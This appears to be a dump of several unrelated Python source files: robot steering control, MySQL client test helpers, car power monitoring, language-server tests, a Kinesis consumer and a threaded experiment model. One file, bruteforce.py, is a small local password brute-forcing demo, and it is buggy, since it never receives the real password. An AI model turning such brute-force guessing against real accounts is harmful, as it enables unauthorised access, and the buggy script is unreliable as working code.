rospy.wait_for_service(thisJointName + '/' + thisJointName + '/params')
try:
joint_srv = rospy.ServiceProxy(thisJointName + '/' + thisJointName + '/params', SetControllerParameters)
joint_srv(proportional_value, derivative_value)
except rospy.ServiceException as e:
print("Service call joint_foot_left failed:", e)
## Documentation for a function
#
# Updates the global variable @requested_steering_angle when another node publishes a new
# requested steering_angle to the topic "cmd_steering_angle_rickshaw".
def update_steering_angle(steering_angle_F32):
global requested_steering_angle
requested_steering_angle = steering_angle_F32.data
if PRINT_DEBUG:
log_msg = "updating requested_steering_angle: " + str(requested_steering_angle)
print(log_msg)
## Documentation for a function.
#
# Checks if the parameter @steering_angle is within the range of
# reachable steering-angles of Roboy.
def check_steering_angle_range(steering_angle):
min_angle = min(_trajectorySteering)
max_angle = max(_trajectorySteering)
if min_angle <= steering_angle <= max_angle:
return True
else:
log_msg = "requested steering_angle (" + str(steering_angle) + ") out of range [" \
+ str(min_angle) + ";" + str(max_angle) + "]"
ros_log_error_pub.publish(log_msg)
return False
## Documentation for a function.
#
# Evaluates the correspondent joint-angle of @joint_name to given @steering_angle
# using the interpolation-function of @joint_name
#
# Publishes the computed value to the correspondent ros-topic of @joint_name
# to apply position control.
#
# Waits until the joint_angle has reached requested joint_angle within
# error tolerance.
def publish_joint_angle(joint_name, steering_angle):
if check_steering_angle_range(steering_angle):
pub = None
f_interpolated = None
f_regressed = None
if joint_name == JOINT_SHOULDER_AXIS0_LEFT:
pub = ros_left_shoulder_axis0_pub
f_interpolated = _interpolatedShoulder0Left
f_regressed = _regressedShoulder0Left
elif joint_name == JOINT_SHOULDER_AXIS1_LEFT:
pub = ros_left_shoulder_axis1_pub
f_interpolated = _interpolatedShoulder1Left
f_regressed = _regressedShoulder1Left
elif joint_name == JOINT_SHOULDER_AXIS2_LEFT:
pub = ros_left_shoulder_axis2_pub
f_interpolated = _interpolatedShoulder2Left
f_regressed = _regressedShoulder2Left
elif joint_name == JOINT_SHOULDER_AXIS0_RIGHT:
pub = ros_right_shoulder_axis0_pub
f_interpolated = _interpolatedShoulder0Right
f_regressed = _regressedShoulder0Right
elif joint_name == JOINT_SHOULDER_AXIS1_RIGHT:
pub = ros_right_shoulder_axis1_pub
f_interpolated = _interpolatedShoulder1Right
f_regressed = _regressedShoulder1Right
elif joint_name == JOINT_SHOULDER_AXIS2_RIGHT:
pub = ros_right_shoulder_axis2_pub
f_interpolated = _interpolatedShoulder2Right
f_regressed = _regressedShoulder2Right
elif joint_name == JOINT_ELBOW_ROT0_LEFT:
pub = ros_elbow_left_rot0_pub
f_interpolated = _interpolatedElbow0Left
f_regressed = _regressedElbow0Left
elif joint_name == JOINT_ELBOW_ROT1_LEFT:
pub = ros_elbow_left_rot1_pub
f_interpolated = _interpolatedElbow1Left
f_regressed = _regressedElbow1Left
elif joint_name == JOINT_ELBOW_ROT0_RIGHT:
pub = ros_elbow_right_rot0_pub
f_interpolated = _interpolatedElbow0Right
f_regressed = _regressedElbow0Right
elif joint_name == JOINT_ELBOW_ROT1_RIGHT:
pub = ros_elbow_right_rot1_pub
f_interpolated = _interpolatedElbow1Right
f_regressed = _regressedElbow1Right
elif joint_name == JOINT_WRIST_0_LEFT:
pub = ros_left_wrist_0_pub
f_interpolated = _interpolatedWrist0Left
f_regressed = _regressedWrist0Left
elif joint_name == JOINT_WRIST_1_LEFT:
pub = ros_left_wrist_1_pub
f_interpolated = _interpolatedWrist1Left
f_regressed = _regressedWrist1Left
elif joint_name == JOINT_WRIST_0_RIGHT:
pub = ros_right_wrist_0_pub
f_interpolated = _interpolatedWrist0Right
f_regressed = _regressedWrist0Right
elif joint_name == JOINT_WRIST_1_RIGHT:
pub = ros_right_wrist_1_pub
f_interpolated = _interpolatedWrist1Right
f_regressed = _regressedWrist1Right
elif joint_name == JOINT_BIKE_FRONT:
pub = ros_bike_front_pub
else:
ros_log_error_pub.publish("Didn't catch joint_name in publish_joint_angle()")
target_joint_angle = None
if joint_name == JOINT_BIKE_FRONT:
target_joint_angle = steering_angle
else:
# target_joint_angle = f_interpolated(steering_angle)
target_joint_angle = f_regressed(steering_angle)
pub.publish(target_joint_angle)
if PRINT_DEBUG:
log_msg = "publishing " + str(target_joint_angle) + " to joint: " + joint_name
print(log_msg)
# ADDED THIS FOR FEEDBACK CONTROL
transition_end_time = time.time() + STEP_TRANSITION_TIME
while (time.time() < transition_end_time) and abs(
get_joint_position(joint_name) - target_joint_angle) > JOINT_TARGET_ERROR_TOLERANCE:
time.sleep(0.001) # Wait
# time.sleep(STEP_TRANSITION_TIME)
else:
global angle_change_successful
angle_change_successful = False
pass
## Documentation for a function.
#
# Controls the whole steering-process.
# Evaluates the target_steering_angles between requested_steering_angle
# and current_steering_angle and creates a Thread for every joint-angle
# with which is responsible to apply correspondent joint-angle given
# current target_steering_angle.
#
# Simplified Pseudo-code:
#
# while requested_steering_angle = current_steering_angle:
#
# sleep()
#
# if angle_difference(requested_steering_angle, current_steering_angle) > max_angle_change
#
# target_steering_angle = current_steering_angle + max_angle_change
#
# else:
#
# target_steering_angle = requested_steering_angle
#
# for joint in joint_list:
#
# Thread.publish_joint_angle(joint_name, target_joint_angle)
#
# for Thread in created_threads:
#
# Thread.join
#
# current_steering_angle = target_steering_angle
def steering_control():
rospy.Subscriber("/target_angle", Float64, update_steering_angle)
current_steering_angle = 0
global angle_change_successful
while not rospy.is_shutdown():
if requested_steering_angle == current_steering_angle:
if PRINT_DEBUG:
log_msg = "\nrequested_steering_angle = current_steering_angle = " + str(requested_steering_angle)
print(log_msg)
while requested_steering_angle == current_steering_angle:
time.sleep(UPDATE_FREQUENCY)
if PRINT_DEBUG:
log_msg = "\nrequested_steering_angle = " + str(requested_steering_angle)
log_msg += "\ncurrent_steering_angle = " + str(current_steering_angle)
print(log_msg)
if get_angle_difference(current_steering_angle, requested_steering_angle) > MAX_ANGLE_CHANGE:
target_steering_angle = 0
if current_steering_angle < requested_steering_angle:
target_steering_angle = current_steering_angle + MAX_ANGLE_CHANGE
else:
target_steering_angle = current_steering_angle - MAX_ANGLE_CHANGE
if PRINT_DEBUG:
log_msg = "target_steering_angle = " + str(target_steering_angle)
print(log_msg)
publisher_threads = []
i = 0
for joint in _joints_list:
publisher_threads.append(Thread(target=publish_joint_angle, args=(joint, target_steering_angle)))
publisher_threads[i].start()
i += 1
for thread in publisher_threads:
thread.join()
if angle_change_successful:
current_steering_angle = target_steering_angle
else:
print("Steering angle out of range: ", target_steering_angle)
angle_change_successful = True
else:
publisher_threads = []
i = 0
for joint in _joints_list:
publisher_threads.append(Thread(target=publish_joint_angle, args=(joint, requested_steering_angle)))
publisher_threads[i].start()
i += 1
for thread in publisher_threads:
thread.join()
if angle_change_successful:
current_steering_angle = requested_steering_angle
else:
print("Steering angle out of range: ", requested_steering_angle)
angle_change_successful = True
## Documentation for a function
#
# Initializes the Control-Node for Steering and starts Steering-Algorithm.
def main():
rospy.init_node('steering_simulation', anonymous=True)
rospy.Subscriber("joint_state", JointState, joint_state_callback)
import_joint_trajectory_record()
interpolate_joint_angles()
regress_joint_positions_from_file("trajectory_steering/saved_coefficients.json")
set_joint_controller_parameters(1000, 0)
steering_control()
if __name__ == '__main__':
main()
|
utils.py
|
import os
import time
import signal
import platform
import multiprocessing
import pymysql
import pytest
from mycli.main import special
PASSWORD = os.getenv('PYTEST_PASSWORD')
USER = os.getenv('PYTEST_USER', 'root')
HOST = os.getenv('PYTEST_HOST', 'localhost')
PORT = os.getenv('PYTEST_PORT', 3306)
CHARSET = os.getenv('PYTEST_CHARSET', 'utf8')
SSH_USER = os.getenv('PYTEST_SSH_USER', None)
SSH_HOST = os.getenv('PYTEST_SSH_HOST', None)
SSH_PORT = os.getenv('PYTEST_SSH_PORT', 22)
def db_connection(dbname=None):
conn = pymysql.connect(user=USER, host=HOST, port=PORT, database=dbname,
password=PASSWORD, charset=CHARSET,
local_infile=False)
conn.autocommit = True
return conn
try:
db_connection()
CAN_CONNECT_TO_DB = True
except:
CAN_CONNECT_TO_DB = False
dbtest = pytest.mark.skipif(
not CAN_CONNECT_TO_DB,
reason="Need a mysql instance at localhost accessible by user 'root'")
def create_db(dbname):
with db_connection().cursor() as cur:
try:
cur.execute('''DROP DATABASE IF EXISTS _test_db''')
cur.execute('''CREATE DATABASE _test_db''')
except:
pass
def run(executor, sql, rows_as_list=True):
"""Return string output for the sql to be run."""
result = []
for title, rows, headers, status in executor.run(sql):
rows = list(rows) if (rows_as_list and rows) else rows
result.append({'title': title, 'rows': rows, 'headers': headers,
'status': status})
return result
def set_expanded_output(is_expanded):
"""Pass-through for the tests."""
return special.set_expanded_output(is_expanded)
def is_expanded_output():
"""Pass-through for the tests."""
return special.is_expanded_output()
def send_ctrl_c_to_pid(pid, wait_seconds):
"""Sends a Ctrl-C like signal to the given `pid` after `wait_seconds`
seconds."""
time.sleep(wait_seconds)
system_name = platform.system()
if system_name == "Windows":
os.kill(pid, signal.CTRL_C_EVENT)
else:
os.kill(pid, signal.SIGINT)
def send_ctrl_c(wait_seconds):
"""Create a process that sends a Ctrl-C like signal to the current process
after `wait_seconds` seconds.
Returns the `multiprocessing.Process` created.
"""
ctrl_c_process = multiprocessing.Process(
target=send_ctrl_c_to_pid, args=(os.getpid(), wait_seconds)
)
ctrl_c_process.start()
return ctrl_c_process
|
bruteforce.py
|
import itertools
import string
import random
import sys
import multiprocessing
def bruteforce(charset, maxlen, startposition):
return (''.join(candidate)
for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i)
for i in range(startposition, maxlen + 1)))
alnum_charset = string.ascii_lowercase + string.ascii_uppercase + "0123456789"
alnumsymbol_charset = alnum_charset + "!@#$%^&*()-_+=[]{}|\/.,;:\'\"`~"
def gen_rand_password(charset, pass_len):
return ''.join(charset[random.randrange(len(charset))] for i in xrange(pass_len))
def attempt_bruteforce(password, maxlen, startposition):
for attempt in bruteforce(alnumsymbol_charset, maxlen, startposition):
if attempt == password:
print password
sys.exit()
else:
continue
def main():
password = gen_rand_password(alnumsymbol_charset, 2)
jobs = []
procs = 8
for i in xrange(0, procs):
process = multiprocessing.Process(target=attempt_bruteforce, args=(alnumsymbol_charset, 4, i))
process.daemon = True
jobs.append(process)
for j in jobs:
j.start()
for j in jobs:
j.join()
if __name__ == '__main__':
main()
|
power_monitoring.py
|
import random
import threading
import time
from statistics import mean
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
# A C2 uses about 1W while idling, and 30h seens like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 11.0 # Lower limit on the LPF car battery voltage
VBATT_INSTANT_PAUSE_CHARGING = 7.0 # Lower limit on the instant car battery voltage measurements to avoid triggering on instant power loss
MAX_TIME_OFFROAD_S = 30*3600
MIN_ON_TIME_S = 3600
class PowerMonitoring:
def __init__(self):
self.params = Params()
self.last_measurement_time = None # Used for integration delta
self.last_save_time = 0 # Used for saving current value in a param
self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad
self.next_pulsed_measurement_time = None
self.car_voltage_mV = 12e3 # Low-passed version of pandaState voltage
self.car_voltage_instant_mV = 12e3 # Last value of pandaState voltage
self.integration_lock = threading.Lock()
self.ts_last_charging_ctrl = None
car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
if car_battery_capacity_uWh is None:
car_battery_capacity_uWh = 0
# Reset capacity if it's low
self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))
# Calculation tick
def calculate(self, pandaState):
try:
now = sec_since_boot()
# If pandaState is None, we're probably not in a car, so we don't care
if pandaState is None or pandaState.pandaState.pandaType == log.PandaState.PandaType.unknown:
with self.integration_lock:
self.last_measurement_time = None
self.next_pulsed_measurement_time = None
self.power_used_uWh = 0
return
# Low-pass battery voltage
self.car_voltage_instant_mV = pandaState.pandaState.voltage
self.car_voltage_mV = ((pandaState.pandaState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
# Cap the car battery power and save it in a param every 10-ish seconds
self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
if now - self.last_save_time >= 10:
put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
self.last_save_time = now
# First measurement, set integration time
with self.integration_lock:
if self.last_measurement_time is None:
self.last_measurement_time = now
return
if (pandaState.pandaState.ignitionLine or pandaState.pandaState.ignitionCan):
# If there is ignition, we integrate the charging rate of the car
with self.integration_lock:
self.power_used_uWh = 0
integration_time_h = (now - self.last_measurement_time) / 3600
if integration_time_h < 0:
raise ValueError(f"Negative integration time: {integration_time_h}h")
self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
self.last_measurement_time = now
else:
# No ignition, we integrate the offroad power used by the device
is_uno = pandaState.pandaState.pandaType == log.PandaState.PandaType.uno
# Get current power draw somehow
current_power = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power is not None:
pass
elif HARDWARE.get_battery_status() == 'Discharging':
# If the battery is discharging, we can use this measurement
# On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
# TODO: Figure out why this is off by a factor of 3/4???
FUDGE_FACTOR = 1.33
# Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
def perform_pulse_measurement(now):
try:
HARDWARE.set_battery_charging(False)
time.sleep(5)
# Measure for a few sec to get a good average
voltages = []
currents = []
for _ in range(6):
voltages.append(HARDWARE.get_battery_voltage())
currents.append(HARDWARE.get_battery_current())
time.sleep(1)
current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
self._perform_integration(now, current_power * FUDGE_FACTOR)
# Enable charging again
HARDWARE.set_battery_charging(True)
except Exception:
cloudlog.exception("Pulsed power measurement failed")
# Start pulsed measurement and return
threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
self.next_pulsed_measurement_time = None
return
elif self.next_pulsed_measurement_time is None and not is_uno:
# On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
# Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
# We shouldn't do this very often, so make sure it has been some long-ish random time interval
self.next_pulsed_measurement_time = now + random.randint(120, 180)
return
else:
# Do nothing
return
# Do the integration
self._perform_integration(now, current_power)
except Exception:
cloudlog.exception("Power monitoring calculation failed")
def _perform_integration(self, t, current_power):
with self.integration_lock:
try:
if self.last_measurement_time:
integration_time_h = (t - self.last_measurement_time) / 3600
power_used = (current_power * 1000000) * integration_time_h
if power_used < 0:
raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
self.power_used_uWh += power_used
self.car_battery_capacity_uWh -= power_used
self.last_measurement_time = t
except Exception:
cloudlog.exception("Integration failed")
# Get the power usage
def get_power_used(self):
return int(self.power_used_uWh)
def get_car_battery_capacity(self):
return int(self.car_battery_capacity_uWh)
# See if we need to disable charging
def should_disable_charging(self, pandaState, offroad_timestamp):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
disable_charging = False
disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3)) and (self.car_voltage_instant_mV > (VBATT_INSTANT_PAUSE_CHARGING * 1e3))
disable_charging |= (self.car_battery_capacity_uWh <= 0)
disable_charging &= (not pandaState.pandaState.ignitionLine and not pandaState.pandaState.ignitionCan)
disable_charging &= (not self.params.get_bool("DisablePowerDown"))
disable_charging &= (pandaState.pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected)
disable_charging |= self.params.get_bool("ForcePowerDown")
return disable_charging
# See if we need to shutdown
def should_shutdown(self, pandaState, offroad_timestamp, started_seen):
if pandaState is None or offroad_timestamp is None:
return False
if HARDWARE.get_battery_charging():
return False
now = sec_since_boot()
panda_charging = (pandaState.pandaState.usbPowerMode != log.PandaState.UsbPowerMode.client)
BATT_PERC_OFF = 90 # 10 if LEON else 3
should_shutdown = False
# Wait until we have shut down charging before powering down
if (now - offroad_timestamp) < 10:
pass
elif HARDWARE.get_battery_capacity() < 5:
should_shutdown = True
else:
should_shutdown |= (not panda_charging and self.should_disable_charging(pandaState, offroad_timestamp))
should_shutdown |= (HARDWARE.get_battery_capacity() < BATT_PERC_OFF)
should_shutdown &= started_seen or (now > MIN_ON_TIME_S)
return should_shutdown
def charging_ctrl(self, msg, ts, to_discharge, to_charge ):
if self.ts_last_charging_ctrl is None or (ts - self.ts_last_charging_ctrl) >= 300.:
battery_changing = HARDWARE.get_battery_charging()
if self.ts_last_charging_ctrl:
if msg.deviceState.batteryPercent >= to_discharge and battery_changing:
HARDWARE.set_battery_charging(False)
elif msg.deviceState.batteryPercent <= to_charge and not battery_changing:
HARDWARE.set_battery_charging(True)
self.ts_last_charging_ctrl = ts
|
test_server_connection.py
|
import asyncio
import os
from threading import Thread
from unittest.mock import Mock
import pytest
from pygls.server import LanguageServer
@pytest.mark.asyncio
async def test_tcp_connection_lost():
loop = asyncio.new_event_loop()
server = LanguageServer(loop=loop)
server.lsp.connection_made = Mock()
server.lsp.connection_lost = Mock()
# Run the server over TCP in a separate thread
server_thread = Thread(target=server.start_tcp, args=('127.0.0.1', 0, ))
server_thread.daemon = True
server_thread.start()
# Wait for server to be ready
while server._server is None:
await asyncio.sleep(.5)
# Simulate client's connection
port = server._server.sockets[0].getsockname()[1]
reader, writer = await asyncio.open_connection('127.0.0.1', port)
await asyncio.sleep(1)
assert server.lsp.connection_made.called
# Socket is closed (client's process is terminated)
writer.close()
await asyncio.sleep(1)
assert server.lsp.connection_lost.called
@pytest.mark.asyncio
async def test_io_connection_lost():
# Client to Server pipe.
csr, csw = os.pipe()
# Server to client pipe.
scr, scw = os.pipe()
server = LanguageServer(loop=asyncio.new_event_loop())
server.lsp.connection_made = Mock()
server_thread = Thread(
target=server.start_io,
args=(os.fdopen(csr, 'rb'), os.fdopen(scw, 'wb'))
)
server_thread.daemon = True
server_thread.start()
# Wait for server to be ready
while not server.lsp.connection_made.called:
await asyncio.sleep(.5)
# Pipe is closed (client's process is terminated)
os.close(csw)
server_thread.join()
|
ramps.py
|
import random
from queue import Queue
import json
from threading import Thread, Lock, Semaphore
import time
import uuid
import datetime
import logging
import boto3
from motorway.messages import Message
from motorway.ramp import Ramp
from boto3.dynamodb.conditions import Attr
shard_election_logger = logging.getLogger("motorway.contrib.amazon_kinesis.shard_election")
logger = logging.getLogger(__name__)
class NoItemsReturned(Exception):
pass
class KinesisRamp(Ramp):
stream_name = None
heartbeat_timeout = 30 # Wait 10 seconds for a heartbeat update, or kill it
MAX_UNCOMPLETED_ITEMS = 3000
GET_RECORDS_LIMIT = 1000
def __init__(self, shard_threads_enabled=True, **kwargs):
super(KinesisRamp, self).__init__(**kwargs)
self.conn = boto3.client(**self.connection_parameters('kinesis'))
assert self.stream_name, "Please define attribute stream_name on your KinesisRamp"
control_table_name = self.get_control_table_name()
self.worker_id = str(uuid.uuid4())
self.semaphore = Semaphore()
self.uncompleted_ids = {}
self.dynamodb_client = boto3.client(**self.connection_parameters('dynamodb'))
if shard_threads_enabled:
self.dynamodb = boto3.resource(**self.connection_parameters('dynamodb'))
try:
self.dynamodb_client.describe_table(TableName=control_table_name)
except self.dynamodb_client.exceptions.ResourceNotFoundException:
self.dynamodb_client.create_table(
TableName=control_table_name,
KeySchema=[
{
'AttributeName': 'shard_id',
'KeyType': 'HASH'
},
],
ProvisionedThroughput={
'ReadCapacityUnits': 10,
'WriteCapacityUnits': 10
},
AttributeDefinitions=[
{
'AttributeName': 'shard_id',
'AttributeType': 'S'
},
],
)
self.dynamodb_client.get_waiter('table_exists').wait(TableName=control_table_name)
self.control_table = self.dynamodb.Table(control_table_name)
shards = self.conn.describe_stream(StreamName=self.stream_name)['StreamDescription']['Shards']
random.shuffle(shards) # Start the threads in random order, in case of bulk restart
threads = []
self.insertion_queue = Queue()
for i, shard in enumerate(shards):
self.uncompleted_ids[shard['ShardId']] = set()
t = Thread(target=self.process_shard, name="%s-%s" % (self.__class__.__name__, i), args=(shard['ShardId'], ))
threads.append(t)
t.start()
def get_control_table_name(self):
return 'pipeline-control-%s' % self.stream_name
def claim_shard(self, shard_id):
"""
Atomically update the shard in DynamoDB
:param shard_id:
:return: bool
"""
shard_election_logger.info("Claiming shard %s" % shard_id)
try:
control_record = self.control_table.get_item(Key={'shard_id': shard_id})['Item']
except KeyError:
raise NoItemsReturned()
control_record['worker_id'] = self.worker_id
control_record['heartbeat'] = 0
try:
self.control_table.put_item(Item=control_record,
ConditionExpression=Attr('shard_id').eq(shard_id) & Attr('checkpoint').eq(control_record['checkpoint'])
# ensure that the record was not changed between the get and put.
)
except self.dynamodb_client.exceptions.ConditionalCheckFailedException: # Someone else edited the record
shard_election_logger.debug("Failed to claim %s to %s" % (shard_id, self.worker_id))
return False
return True
def can_claim_shard(self, shard_id):
"""
Determine whether or not a given shard can be claimed because of
1) It's currently not being processed by another process
2) It's unevenly balanced between the consuming nodes/workers
:param shard_id:
:return: bool
"""
# =====================================
# | C L A I M S T A L E S H A R D S |
# =====================================
worker_heartbeats = {} # Store all heartbeats so we can compare them easily to track changes
control_record = None
shards = self.control_table.scan()['Items']
for shard in shards:
if shard['shard_id'] == shard_id:
control_record = dict(shard)
worker_heartbeats[shard['worker_id']] = shard['heartbeat']
if control_record is None:
raise NoItemsReturned()
worker_heartbeats[self.worker_id] = 0
time.sleep(self.heartbeat_timeout)
updated_control_record = self.control_table.get_item(Key={'shard_id': shard_id})['Item']
# Continue sleeping if heartbeat or worker id has changed
if control_record['heartbeat'] == updated_control_record['heartbeat'] and control_record['worker_id'] == updated_control_record['worker_id']:
# if both the heartbeat and the worker_id is the same
shard_election_logger.debug("Shard %s - heartbeat and worker id remained unchanged for defined time, taking over" % shard_id)
return True
elif updated_control_record['worker_id'] != control_record['worker_id']:
shard_election_logger.debug("Shard %s - Worker id changed to %s, continue sleeping" % (shard_id, updated_control_record['worker_id']))
else:
shard_election_logger.debug("Shard %s - Heartbeat changed, continue sleeping" % shard_id)
# =====================
# | B A L A N C I N G |
# =====================
# Balance, if possible
active_workers = {
self.worker_id: True
}
# re-fetch the shards and compare the heartbeat
shards = self.control_table.scan()['Items']
for shard in shards: # Update active worker cache
if shard['worker_id'] in worker_heartbeats and worker_heartbeats[shard['worker_id']] == shard['heartbeat']:
active_workers[shard['worker_id']] = False
else:
active_workers[shard['worker_id']] = True
number_of_active_workers = sum([1 for is_active in active_workers.values() if is_active])
number_of_shards = len(shards)
optimal_number_of_shards_per_worker = number_of_shards // number_of_active_workers
workers = set([shard['worker_id'] for shard in shards])
shards_per_worker = {worker: sum([1 for shard in shards if shard['worker_id'] == worker]) for worker in workers}
for shard in shards:
if shard['shard_id'] == shard_id:
if (
# Check if the shards current worker has too many, or if the worker has no workers, then take
# the shard if the current worker has more than one shard!
shards_per_worker.get(shard['worker_id'], 0) > optimal_number_of_shards_per_worker or (
shards_per_worker.get(self.worker_id, 0) == 0 and
shards_per_worker.get(shard['worker_id'], 0) > 1
)
) and (
# Only get shards for balancing purposes, if we have too little
shards_per_worker.get(self.worker_id, 0) < optimal_number_of_shards_per_worker
):
shard_election_logger.debug("Taking over %s from %s" % (shard_id, shard['worker_id']))
return True
return False
def process_shard(self, shard_id):
"""
Every shard (at startup) has an active thread that runs this function to either consume or wait to be
ready to consume data from a shard
:param shard_id:
:return:
"""
while True:
try:
# try to claim the shard
try:
# Continuously try to claim until broken out of
while True:
# First check if we can claim outside the semaphore in parallel on all shards
if self.can_claim_shard(shard_id):
# If we can claim it, try again with a semaphore ensuring we fully check the entire
# table of workers/shards before we take the final decision
with self.semaphore:
if self.can_claim_shard(shard_id):
if self.claim_shard(shard_id):
break
# Wait a bit until we check if it's available to claim again
time.sleep(random.randrange(2, 15))
except NoItemsReturned:
# no record for this shard found, nobody ever claimed the shard yet, so claim it
self.control_table.put_item(Item={
'shard_id': shard_id,
'checkpoint': 0,
'worker_id': self.worker_id,
'heartbeat': 0,
})
# get initial iterator
control_record = self.control_table.get_item(Key={'shard_id': shard_id})['Item']
if control_record['checkpoint']:
# if we have a checkpoint, start from the checkpoint
iterator = self.conn.get_shard_iterator(
StreamName=self.stream_name,
ShardId=shard_id,
ShardIteratorType="AT_SEQUENCE_NUMBER",
StartingSequenceNumber=str(control_record['checkpoint'])
)['ShardIterator']
else:
# we have no checkpoint stored, start from the latest item in Kinesis
iterator = self.conn.get_shard_iterator(
StreamName=self.stream_name,
ShardId=shard_id,
ShardIteratorType="LATEST",
)['ShardIterator']
cloudwatch = boto3.client(**self.connection_parameters('cloudwatch'))
current_minute = lambda: datetime.datetime.now().minute
minute = None
latest_item = None
while True:
control_record = self.control_table.get_item(Key={'shard_id': shard_id})['Item'] # always retrieve this at the top of the loop
current_checkpoint = control_record['checkpoint']
current_heartbeat = control_record['heartbeat']
# if the shard was claimed by another worker, break out of the loop
if not control_record['worker_id'] == self.worker_id:
shard_election_logger.info("Lost shard %s, going back to standby" % shard_id)
break
# update the heartbeat and the checkpoint
control_record['heartbeat'] += 1
if len(self.uncompleted_ids[shard_id]):
# Get the "youngest" uncompleted sequence number
control_record['checkpoint'] = min(self.uncompleted_ids[shard_id])
elif latest_item:
# or the latest item we yielded
control_record['checkpoint'] = latest_item
self.control_table.put_item(Item=control_record,
ConditionExpression=Attr('shard_id').eq(shard_id) & Attr('checkpoint').eq(current_checkpoint) & Attr('worker_id').eq(self.worker_id) & Attr('heartbeat').eq(current_heartbeat)
# Will fail if someone else modified it - ConditionalCheckFailedException
)
if len(self.uncompleted_ids[shard_id]) < self.MAX_UNCOMPLETED_ITEMS:
# get records from Kinesis, using the previously created iterator
result = self.conn.get_records(ShardIterator=iterator, Limit=self.GET_RECORDS_LIMIT)
# insert the records into the queue, and use the provided iterator for the next loop
for record in result['Records']:
self.uncompleted_ids[shard_id].add(record['SequenceNumber'])
latest_item = record['SequenceNumber']
self.insertion_queue.put(record)
iterator = result['NextShardIterator']
else:
logger.debug("Pausing, too many uncompleted items (%s/%s)" % (len(self.uncompleted_ids[shard_id]), self.MAX_UNCOMPLETED_ITEMS))
# we have too many uncompleted items, so back off for a while
# however, the iterator needs to be updated, because it expires after a while
# use the latest record we added to the queue as the starting point
next_iterator_number = latest_item if latest_item else str(control_record['checkpoint'])
iterator = self.conn.get_shard_iterator(
StreamName=self.stream_name,
ShardId=shard_id,
ShardIteratorType="AT_SEQUENCE_NUMBER",
StartingSequenceNumber=next_iterator_number
)['ShardIterator']
# get just one item to update the MillisBehindLatest below
result = self.conn.get_records(ShardIterator=iterator, Limit=1)
# Push metrics to CloudWatch
delay = result['MillisBehindLatest']
if minute != current_minute(): # push once per minute to CloudWatch.
minute = current_minute()
cloudwatch.put_metric_data(Namespace='Motorway/Kinesis',
MetricData=[{'MetricName': 'MillisecondsBehind',
'Dimensions': [{
'Name': 'Stream',
'Value': self.stream_name
}, {
'Name': 'Shard',
'Value': shard_id
}],
'Value': delay,
'Unit': 'Milliseconds'
}])
# recommended pause between fetches from AWS
time.sleep(1)
except self.dynamodb_client.exceptions.ConditionalCheckFailedException as e:
logger.warning(e)
pass # we're no longer worker for this shard
except (self.dynamodb_client.exceptions.ProvisionedThroughputExceededException, self.dynamodb_client.exceptions.ProvisionedThroughputExceededException,
self.conn.exceptions.LimitExceededException, self.conn.exceptions.ProvisionedThroughputExceededException) as e:
logger.warning(e)
time.sleep(random.randrange(5, self.heartbeat_timeout//2)) # back off for a while
def connection_parameters(self, service_name):
return {
'region_name': 'eu-west-1',
'service_name': service_name,
# Add this or use ENV VARS
# 'aws_access_key_id': '',
# 'aws_secret_access_key': ''
}
def next(self):
msg = self.insertion_queue.get()
try:
yield Message(msg['SequenceNumber'], json.loads(msg['Data']), grouping_value=msg['PartitionKey'])
except ValueError as e:
logger.exception(e)
def success(self, _id):
for uncompleted_ids in self.uncompleted_ids.values():
if _id in uncompleted_ids:
uncompleted_ids.remove(_id)
|
ExperimentControl.py
|
#!/usr/bin/python3
import sys
from threading import Thread
# @license: public domain
# See ExperimentControl.tla for description
class ExperimentControl:
# Init ==
def __init__(self, init_temp=20, low_temp=0, high_temp=50, delta=5):
self.pc = "HEAT"
self.power = "ON"
self.freeze = "NO"
self.temperature = int(init_temp)
self.Low = int(low_temp)
self.High = int(high_temp)
self.delta = int(delta)
self.phase = 1
assert(self.Low < self.High)
assert(self.temperature < self.High)
# run Heat and Freeze simultaneously
thread1 = Thread(target=self.Heat, args=())
thread2 = Thread(target=self.Freeze, args=())
thread2.start()
thread1.start()
thread2.join()
thread1.join()
def Heat(self):
while True:
if self.pc == "DONE":
break
if self.pc == "HEAT":
if self.temperature >= self.High:
self.freeze = "YES"
self.power = "OFF"
self.pc = "FREEZE"
self.phase += 1
else:
self.temperature += self.delta
print(self.pc, self.temperature)
def Freeze(self):
#assert(self.pc == "FREEZE")
while True:
if self.pc == "DONE":
break
if self.pc == "FREEZE":
if self.temperature <= self.Low:
self.freeze = "YES"
if self.phase != 4:
self.power = "ON"
self.pc = "HEAT"
self.phase +=1
else:
